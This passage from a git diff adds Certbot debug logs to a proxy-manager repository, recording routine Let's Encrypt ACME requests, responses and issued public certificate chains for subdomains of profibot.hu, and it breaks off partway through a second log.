"MIIBJDCBqwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEWXMvMEIeqT_BIiIvbx32iIua7YMHHNdIxCzLlP2hho74rE67sXKwcvt18MKcZfIDsqM6fzoTlCtDRzHmjtAe8_iaVvBB2RmkXKB17FQrGA9t5cLqBm2xJ5x31rQ0qQtBoCwwKgYJKoZIhvcNAQkOMR0wGzAZBgNVHREEEjAQgg5kYi5wcm9maWJvdC5odTAKBggqhkjOPQQDAgNoADBlAjAxgQP0MIhF96QGS37j5VPDFWgGyNY6irPD4csKAvhuzs3L5cR4QvRwiZZPm8sW2uoCMQDxU6iTyQi-DB8Ho8OO_rESsnhOmAL5pwWFWzhiQ4vKKUFGD4ME7XgGe7mEV2dvZkk"\n}' +2025-12-25 04:10:21,798:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462430571446: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRUxKQ0FGcDdQTF9OYi1rdXVOT05XcVN6VnhtdklpNUdmTmdRaXdSclJWdjgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzI5MDY0MzgxNzYvNDYyNDMwNTcxNDQ2In0", + "signature": "I4HPxxOiDM2Lvsu6R0YhZWJIzERhqJvOkz1FiFam76TOVBQJPwmJC8DS2nsV0Fu3BqKW_zXijKMZPJakvRfWwB1QN8hoQi5YDijQHNRpkPvd2E1qs9v7tZMNc1rQvVqxZL9X_mvkzpNOSSiSBiKQ0nsit9-67_iaF3UcwrGKFT8DUbsBW6aLKfu9SwNOkrWG_VjGp724i835Pfa4nUVM7zZTUwSb8Yqk9PcDWWC69T4TXd7M554XRk1ZNaRACW1jcXrm7S2-eejwlBZPQRc4Kof_t4wyxg_VujjpgV5uUExkV78Lcp4gN7urCRVEnRoR5CpUOVKU7l3inK4QbE5rRg", + "payload": "ewogICJjc3IiOiAiTUlJQkpEQ0Jxd0lCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFV1hNdk1FSWVxVF9CSWlJdmJ4MzJpSXVhN1lNSEhOZEl4Q3pMbFAyaGhvNzRyRTY3c1hLd2N2dDE4TUtjWmZJRHNxTTZmem9UbEN0RFJ6SG1qdEFlOF9pYVZ2QkIyUm1rWEtCMTdGUXJHQTl0NWNMcUJtMnhKNXgzMXJRMHFRdEJvQ3d3S2dZSktvWklodmNOQVFrT01SMHdHekFaQmdOVkhSRUVFakFRZ2c1a1lpNXdjbTltYVdKdmRDNW9kVEFLQmdncWhrak9QUVFEQWdOb0FEQmxBakF4Z1FQME1JaEY5NlFHUzM3ajVWUERGV2dHeU5ZNmlyUEQ0Y3NLQXZodXpzM0w1Y1I0UXZSd2laWlBtOHNXMnVvQ01RRHhVNmlUeVFpLURCOEhvOE9PX3JFU3NuaE9tQUw1cHdXRld6aGlRNHZLS1VGR0Q0TUU3WGdHZTdtRVYyZHZaa2siCn0" +} +2025-12-25 04:10:22,841:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/2906438176/462430571446 HTTP/1.1" 200 450 +2025-12-25 04:10:22,842:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:10:22 GMT +Content-Type: application/json +Content-Length: 450 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462430571446 +Replay-Nonce: fULB7aUJXuClAWbLAo3PuZDS321otxL2fUuLlGHZNHxe_O4Sm4Y +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "valid", + "expires": "2026-01-01T04:09:48Z", + "identifiers": [ + { + "type": "dns", + "value": "db.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668458316" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462430571446", + "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/059e768c03bb6e5072af72673a15a2d0f840" +} +2025-12-25 04:10:22,843:DEBUG:acme.client:Storing nonce: fULB7aUJXuClAWbLAo3PuZDS321otxL2fUuLlGHZNHxe_O4Sm4Y +2025-12-25 04:10:23,844:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:10:23,847:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462430571446: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSlh1Q2xBV2JMQW8zUHVaRFMzMjFvdHhMMmZVdUxsR0haTkh4ZV9PNFNtNFkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzI5MDY0MzgxNzYvNDYyNDMwNTcxNDQ2In0", + "signature": "OOSjowsrWtN7jB4LzBdZk20TaEYTJrlha007jEPqQ2oLbeXR-TpzMFcgSixzQ2gqqg7DX323SLjGmwqCIYRN2q2DRs5aDOowpMPIcB-RtUaktl4xcyBa1fhOEuHLqWIrTBDbQVbTqBefZrqGv0pVYz-_8s7os7a_yhQQ-Rz9_VmBIfhnZLx1flUro7AOfTNscOa2i87ZybWTzzpxUdwMfnWELFZ8AAaSTzU1c_HW5OU5mkxilPgk63MrTdQyNVY-QB7lEKjNSMbo5cmt00Fh2GhyQ59av1dCI_r283NMF27dpMxkbWYqgLKhxYNaxw0RcMPdqwtz7vjM87eeaTaxog", + "payload": "" +} +2025-12-25 04:10:24,004:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/2906438176/462430571446 HTTP/1.1" 200 450 +2025-12-25 04:10:24,005:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:10:23 GMT +Content-Type: application/json +Content-Length: 450 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462430571446 +Replay-Nonce: fULB7aUJhJMx015dKj86RWGgL0u2yqW8T2xAZ9WnGmQoJMpNktk +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "valid", + "expires": "2026-01-01T04:09:48Z", + "identifiers": [ + { + "type": "dns", + "value": "db.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668458316" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462430571446", + "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/059e768c03bb6e5072af72673a15a2d0f840" +} +2025-12-25 04:10:24,006:DEBUG:acme.client:Storing nonce: fULB7aUJhJMx015dKj86RWGgL0u2yqW8T2xAZ9WnGmQoJMpNktk +2025-12-25 04:10:24,006:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:10:24,010:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/059e768c03bb6e5072af72673a15a2d0f840: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSmhKTXgwMTVkS2o4NlJXR2dMMHUyeXFXOFQyeEFaOVduR21Rb0pNcE5rdGsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDU5ZTc2OGMwM2JiNmU1MDcyYWY3MjY3M2ExNWEyZDBmODQwIn0", + "signature": "NZViT4Xl6ggkR-NCmQvfgcNZYGQu7lZMy9n1CNF9KwvVJfwLW1DyRo_835QLa1oKlbknE03sviUJINaaBxpzGJR45Ae9K-JzaZ3PKl4Kt-8S2D7O3J43BriJAYBRld0gcyy_E96TGg0Q7iBbKXiu14YxtEQEkI2br7DOZ2Z9qpw9xTba3DA6RxgMKtE9K3XRzMRY-VWDnYeZg2PEFDZCDmcXQB5EBzel0ZFpT0WEUYErLwRs381wZ42PByC3PPcnIqbwVgylX79Qz7OokSQ_yJAjbtpfTeTjkW9_09wmzks9SdRjfVWIeKlobh7331mQSXV5T1d4r4_Z8r5CoLI9mw", + "payload": "" +} +2025-12-25 04:10:24,169:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/059e768c03bb6e5072af72673a15a2d0f840 HTTP/1.1" 200 2905 +2025-12-25 04:10:24,170:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:10:24 GMT +Content-Type: application/pem-certificate-chain +Content-Length: 2905 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="alternate" +Replay-Nonce: 58tS3qjEqRjM6WTitM_4tpj1Oip-44cwn-bUMd_esElyQUGPacY +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +-----BEGIN CERTIFICATE----- +MIIDrjCCAzSgAwIBAgISBZ52jAO7blByr3JnOhWi0PhAMAoGCCqGSM49BAMDMDIx +CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF +NzAeFw0yNTEyMjUwMzExNTFaFw0yNjAzMjUwMzExNTBaMBkxFzAVBgNVBAMTDmRi +LnByb2ZpYm90Lmh1MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEWXMvMEIeqT/BIiIv +bx32iIua7YMHHNdIxCzLlP2hho74rE67sXKwcvt18MKcZfIDsqM6fzoTlCtDRzHm +jtAe8/iaVvBB2RmkXKB17FQrGA9t5cLqBm2xJ5x31rQ0qQtBo4ICJDCCAiAwDgYD +VR0PAQH/BAQDAgeAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNV +HRMBAf8EAjAAMB0GA1UdDgQWBBRVMInCsCl1VCSdcqEo/yMrJEYaYDAfBgNVHSME +GDAWgBSuSJ7chx1EoG/aouVgdAR4wpwAgDAyBggrBgEFBQcBAQQmMCQwIgYIKwYB +BQUHMAKGFmh0dHA6Ly9lNy5pLmxlbmNyLm9yZy8wGQYDVR0RBBIwEIIOZGIucHJv +Zmlib3QuaHUwEwYDVR0gBAwwCjAIBgZngQwBAgEwLQYDVR0fBCYwJDAioCCgHoYc +aHR0cDovL2U3LmMubGVuY3Iub3JnLzY1LmNybDCCAQwGCisGAQQB1nkCBAIEgf0E +gfoA+AB2ANFuqaVoB35mNaA/N6XdvAOlPEESFNSIGPXpMbMjy5UEAAABm1OzXFUA +AAQDAEcwRQIgNM4jgrhT8BREOSIZHL99IsylcPWwgmvYCmIY+GKy8v0CIQCmRZWo +ShoTtECtRbaWIRaojBBpafr01huWfMbSklfe0gB+AOMjjfKNoojgquCs8PqQyYXw +tr/10qUnsAH8HERYxLboAAABm1OzXbsACAAABQAtLYz3BAMARzBFAiEA9sjOV9J4 +mBiuHX43uxvdC1YWZZ5hWeZScHgDIxEIFSMCIAXL6slhAbeVhGvHeJyOQ+RlWorC +gjXrWCSEDBNrq4CtMAoGCCqGSM49BAMDA2gAMGUCMDW+HSJbA+YBTEmuK6KJwKPF ++lEElscDFB7cPyvvmmpWpYfY1XRMPeOsP8Fmu3pfnAIxAKo2I1RNBk5Ldzr2al7Q +zEiOFzJjnzMxL4LvTmJ80ogEBpXSVhmEGf8n5PwUIM8l5Q== +-----END CERTIFICATE----- + +-----BEGIN CERTIFICATE----- +MIIEVzCCAj+gAwIBAgIRAKp18eYrjwoiCWbTi7/UuqEwDQYJKoZIhvcNAQELBQAw +TzELMAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2Vh +cmNoIEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDEwHhcNMjQwMzEzMDAwMDAw +WhcNMjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3Mg +RW5jcnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6AST +CFh/vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbef +QHJFHCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgw +gfUwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD +ATASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4 +wpwAgDAfBgNVHSMEGDAWgBR5tFnme7bl5AFzgAiIyBpY9umbbjAyBggrBgEFBQcB +AQQmMCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94MS5pLmxlbmNyLm9yZy8wEwYDVR0g +BAwwCjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gxLmMubGVu +Y3Iub3JnLzANBgkqhkiG9w0BAQsFAAOCAgEAjx66fDdLk5ywFn3CzA1w1qfylHUD +aEf0QZpXcJseddJGSfbUUOvbNR9N/QQ16K1lXl4VFyhmGXDT5Kdfcr0RvIIVrNxF +h4lqHtRRCP6RBRstqbZ2zURgqakn/Xip0iaQL0IdfHBZr396FgknniRYFckKORPG +yM3QKnd66gtMst8I5nkRQlAg/Jb+Gc3egIvuGKWboE1G89NTsN9LTDD3PLj0dUMr +OIuqVjLB8pEC6yk9enrlrqjXQgkLEYhXzq7dLafv5Vkig6Gl0nuuqjqfp0Q1bi1o +yVNAlXe6aUXw92CcghC9bNsKEO1+M52YY5+ofIXlS/SEQbvVYYBLZ5yeiglV6t3S +M6H+vTG0aP9YHzLn/KVOHzGQfXDP7qM5tkf+7diZe7o2fw6O7IvN6fsQXEQQj8TJ +UXJxv2/uJhcuy/tSDgXwHM8Uk34WNbRT7zGTGkQRX0gsbjAea/jYAoWv0ZvQRwpq +Pe79D/i7Cep8qWnA+7AE/3B3S/3dEEYmc0lpe1366A/6GEgk3ktr9PEoQrLChs6I +tu3wnNLB2euC8IKGLQFpGtOO/2/hiAKjyajaBP25w1jF0Wl8Bbqne3uZ2q1GyPFJ +YRmT7/OXpmOH/FVLtwS+8ng1cAmpCujPwteJZNcDG0sF2n/sc0+SQf49fdyUK0ty ++VUwFj9tmWxyR/M= +-----END CERTIFICATE----- + +2025-12-25 04:10:24,170:DEBUG:acme.client:Storing nonce: 58tS3qjEqRjM6WTitM_4tpj1Oip-44cwn-bUMd_esElyQUGPacY +2025-12-25 04:10:24,171:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:10:24,174:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/059e768c03bb6e5072af72673a15a2d0f840/1: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRXFSak02V1RpdE1fNHRwajFPaXAtNDRjd24tYlVNZF9lc0VseVFVR1BhY1kiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDU5ZTc2OGMwM2JiNmU1MDcyYWY3MjY3M2ExNWEyZDBmODQwLzEifQ", + "signature": "SJODObCMrRTN94Vsg58YCsuqunqLWzbMBuc_A7VR5QLq0J8ixQz4juXoQ-rG8naW4QVK4iBP2XsGeNE53opijiPlCEOUCfHSiKY37nGQ6ymdx4S3BkFTT2CG-jll9aUf6akqr6FJ_qv5NlbV2veYoCwG4AYuxvRLH--TKvTmbrMd9JdjTHDRvUkHyx1bl7lJk22muWDNSynxI-bQprNP1zrHL8RwwzqvaUulSYCppMPiAkxe0PisR0fPsaHm1xeIQZPdVTC3rIwYhdpFSsBFzIfGBMYoAvIvhmbz89zWQt9mOsmBoSUiM7yXTf-okcpjQ8720qjz77I-O5lPtGCl5w", + "payload": "" +} +2025-12-25 04:10:24,332:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/059e768c03bb6e5072af72673a15a2d0f840/1 HTTP/1.1" 200 2340 +2025-12-25 04:10:24,333:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:10:24 GMT +Content-Type: application/pem-certificate-chain +Content-Length: 2340 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="alternate" +Replay-Nonce: 58tS3qjEkp5_5jVZNb_is73D3aR-KIK7Op_XgCfrQVQOaBypP-k +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +-----BEGIN CERTIFICATE----- +MIIDrjCCAzSgAwIBAgISBZ52jAO7blByr3JnOhWi0PhAMAoGCCqGSM49BAMDMDIx +CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF +NzAeFw0yNTEyMjUwMzExNTFaFw0yNjAzMjUwMzExNTBaMBkxFzAVBgNVBAMTDmRi +LnByb2ZpYm90Lmh1MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEWXMvMEIeqT/BIiIv +bx32iIua7YMHHNdIxCzLlP2hho74rE67sXKwcvt18MKcZfIDsqM6fzoTlCtDRzHm +jtAe8/iaVvBB2RmkXKB17FQrGA9t5cLqBm2xJ5x31rQ0qQtBo4ICJDCCAiAwDgYD +VR0PAQH/BAQDAgeAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNV +HRMBAf8EAjAAMB0GA1UdDgQWBBRVMInCsCl1VCSdcqEo/yMrJEYaYDAfBgNVHSME +GDAWgBSuSJ7chx1EoG/aouVgdAR4wpwAgDAyBggrBgEFBQcBAQQmMCQwIgYIKwYB +BQUHMAKGFmh0dHA6Ly9lNy5pLmxlbmNyLm9yZy8wGQYDVR0RBBIwEIIOZGIucHJv +Zmlib3QuaHUwEwYDVR0gBAwwCjAIBgZngQwBAgEwLQYDVR0fBCYwJDAioCCgHoYc +aHR0cDovL2U3LmMubGVuY3Iub3JnLzY1LmNybDCCAQwGCisGAQQB1nkCBAIEgf0E +gfoA+AB2ANFuqaVoB35mNaA/N6XdvAOlPEESFNSIGPXpMbMjy5UEAAABm1OzXFUA +AAQDAEcwRQIgNM4jgrhT8BREOSIZHL99IsylcPWwgmvYCmIY+GKy8v0CIQCmRZWo +ShoTtECtRbaWIRaojBBpafr01huWfMbSklfe0gB+AOMjjfKNoojgquCs8PqQyYXw +tr/10qUnsAH8HERYxLboAAABm1OzXbsACAAABQAtLYz3BAMARzBFAiEA9sjOV9J4 +mBiuHX43uxvdC1YWZZ5hWeZScHgDIxEIFSMCIAXL6slhAbeVhGvHeJyOQ+RlWorC +gjXrWCSEDBNrq4CtMAoGCCqGSM49BAMDA2gAMGUCMDW+HSJbA+YBTEmuK6KJwKPF ++lEElscDFB7cPyvvmmpWpYfY1XRMPeOsP8Fmu3pfnAIxAKo2I1RNBk5Ldzr2al7Q +zEiOFzJjnzMxL4LvTmJ80ogEBpXSVhmEGf8n5PwUIM8l5Q== +-----END CERTIFICATE----- + +-----BEGIN CERTIFICATE----- +MIICtzCCAjygAwIBAgIRAMWKhaLGI0XgqMRSU4efWTowCgYIKoZIzj0EAwMwTzEL +MAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2VhcmNo +IEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDIwHhcNMjQwMzEzMDAwMDAwWhcN +MjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5j +cnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6ASTCFh/ +vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbefQHJF +HCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgwgfUw +DgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAS +BgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4wpwA +gDAfBgNVHSMEGDAWgBR8Qpau3ktIO/qS+J6Mz22LqXI3lTAyBggrBgEFBQcBAQQm +MCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94Mi5pLmxlbmNyLm9yZy8wEwYDVR0gBAww +CjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gyLmMubGVuY3Iu +b3JnLzAKBggqhkjOPQQDAwNpADBmAjEA/e5N+wjAk945cpaFxGaeMC13fyvdbNzX +lRg9HNdElxi5mXdI4az2CykNU07iFwqEAjEAihPCDkw4b1BvfLg8VNLLuaMpn1Rb +Z1682chR6zNRCseyie4SjyTCdkvsAa+omQSf +-----END CERTIFICATE----- + +2025-12-25 04:10:24,333:DEBUG:acme.client:Storing nonce: 58tS3qjEkp5_5jVZNb_is73D3aR-KIK7Op_XgCfrQVQOaBypP-k +2025-12-25 04:10:24,335:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager +2025-12-25 04:10:24,336:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-14. +2025-12-25 04:10:24,336:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-14. +2025-12-25 04:10:24,336:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-14/cert.pem. +2025-12-25 04:10:24,336:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-14/privkey.pem. +2025-12-25 04:10:24,337:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-14/chain.pem. +2025-12-25 04:10:24,337:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-14/fullchain.pem. +2025-12-25 04:10:24,337:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-14/README. +2025-12-25 04:10:24,347:DEBUG:certbot.configuration:Var account=e417a583de478a0cfdeed332c1113068 (set by user). +2025-12-25 04:10:24,347:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user). +2025-12-25 04:10:24,347:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user). +2025-12-25 04:10:24,347:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user). +2025-12-25 04:10:24,347:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user). +2025-12-25 04:10:24,347:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user). +2025-12-25 04:10:24,347:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user). +2025-12-25 04:10:24,347:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user). +2025-12-25 04:10:24,348:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-25 04:10:24,348:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-25 04:10:24,348:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user). +2025-12-25 04:10:24,348:DEBUG:certbot.configuration:Var webroot_map={'db.profibot.hu': '/data/letsencrypt-acme-challenge'} (set by user). +2025-12-25 04:10:24,349:DEBUG:certbot._internal.display.obj:Notifying user: +Successfully received certificate. +Certificate is saved at: /etc/letsencrypt/live/npm-14/fullchain.pem +Key is saved at: /etc/letsencrypt/live/npm-14/privkey.pem +This certificate expires on 2026-03-25. +These files will be updated when the certificate renews. +2025-12-25 04:10:24,349:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS: +2025-12-25 04:10:24,349:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions. +2025-12-25 04:10:24,350:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by: + * Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate + * Donating to EFF: https://eff.org/donate-le diff --git a/proxy-manager/data/logs/letsencrypt.log.6 b/proxy-manager/data/logs/letsencrypt.log.6 new file mode 100755 index 0000000..3c981bf --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log.6 @@ -0,0 +1,555 @@ +2025-12-25 04:09:22,736:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2025-12-25 04:09:22,736:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2025-12-25 04:09:22,736:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-13', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'nas.profibot.hu'] +2025-12-25 04:09:22,736:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2025-12-25 04:09:22,746:DEBUG:certbot._internal.log:Root logging level set at 30 +2025-12-25 04:09:22,747:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-25 04:09:22,747:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2025-12-25 04:09:22,747:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2025-12-25 04:09:22,747:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2025-12-25 04:09:22,784:DEBUG:certbot._internal.main:Picked account: +2025-12-25 04:09:22,785:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2025-12-25 04:09:22,786:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2025-12-25 04:09:23,219:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2025-12-25 04:09:23,220:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:23 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "U_gvOrHlMcM": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" +} +2025-12-25 04:09:23,221:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for nas.profibot.hu +2025-12-25 04:09:23,224:DEBUG:acme.client:Requesting fresh nonce +2025-12-25 04:09:23,225:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2025-12-25 04:09:23,366:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2025-12-25 04:09:23,367:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:23 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: GxwILcG0WSeKmX2qWUPlMt8T9a2WwxCCQv23ARoSt8sPWWR6SBw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2025-12-25 04:09:23,367:DEBUG:acme.client:Storing nonce: GxwILcG0WSeKmX2qWUPlMt8T9a2WwxCCQv23ARoSt8sPWWR6SBw +2025-12-25 04:09:23,368:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n 